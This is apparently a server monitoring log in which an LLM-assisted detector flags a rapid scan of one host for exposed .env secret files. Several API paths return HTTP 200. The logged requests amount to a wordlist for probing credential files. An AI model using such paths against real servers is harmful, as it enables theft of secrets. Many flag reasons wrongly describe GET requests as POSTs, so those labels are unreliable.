Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.798013 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.797663999Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.local HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.799043 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.798827072Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /shop HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.853105 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.852951376Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.uat HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.855681 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.855241817Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.test HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.956479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.956200581Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.vite HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.061299 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.060902973Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.bak HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.106315 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.106102395Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.backup HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.128005 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.127546196Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.old HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.286839 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.286335620Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.save HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.292891 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.292650216Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.example HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.370752 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.370540261Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /order HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.461364 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.461143441Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /sitemap.xml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.477999 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.477473721Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /checkout HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.516558 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.515922349Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /account HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.589069 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.588604579Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.dist HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.596228 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.595898000Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /payment HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.643757 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.643428692Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.template HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.698531 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.698099926Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.743144 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.742823542Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.757954 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.757664197Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.aws HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.762265 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.761970594Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env.stripe HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.814682 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.814402562Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /.env_sample HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:00.962073 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:00.961832026Z 185.177.72.60 - - [20/Mar/2026:15:16:00 +0000] "captain.admin.kovicloud.com" "GET /env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36,...
Mar 20 15:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:01.008615 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.008392356Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /env.backup HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:01.957783 [observer] Pipeline: processed=6816 pattern_hits=6379 llm_calls=437 llm_errors=3 learned=5
Mar 20 15:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:01.957813 [observer] Patterns: hash=6365 prefix=14 regex=0 contains=0 deny=127 alert=649 suppress=0 misses=437
Mar 20 15:16:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:05.327112 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:16:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:05.327171 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354318 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354357 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:01.028614876Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /api/.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354496 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.129003973Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /plans HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354549 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:01.160586722Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /api/v1/.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354587 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.227611574Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /api/v2/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354626 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.313430771Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /signup HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537....
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354662 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:01.317431857Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /api/shared/.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354696 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:01.331541968Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /api/shared/config/.env HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354727 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.405276910Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /backend/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354756 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.406476284Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /laravel/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354785 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.416563555Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /laravel/core/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354811 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.423206470Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /payment/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354839 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.468593253Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /admin/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354866 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.499384897Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /core/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354899 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.502519520Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /stripe/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354940 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.523761871Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /assets/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354968 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.590648528Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /app/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.354995 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.614896936Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /docker/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355055 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.632939878Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /docker/app/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355083 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.648180409Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /server/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355114 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.681292328Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /web/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355142 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.694469795Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /src/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355188 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.723501889Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /src/config/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355218 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.801516846Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /public/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355245 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.847685301Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /config/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355272 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.855962859Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /portal/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355303 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.860358296Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /billing HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355332 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.870895809Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /env/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355359 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.881413986Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /dev/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355392 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.884973757Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /prod/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:08.355420 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.896362661Z 185.177.72.60 - - [20/Mar/2026:15:16:01 +0000] "captain.admin.kovicloud.com" "GET /new/.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
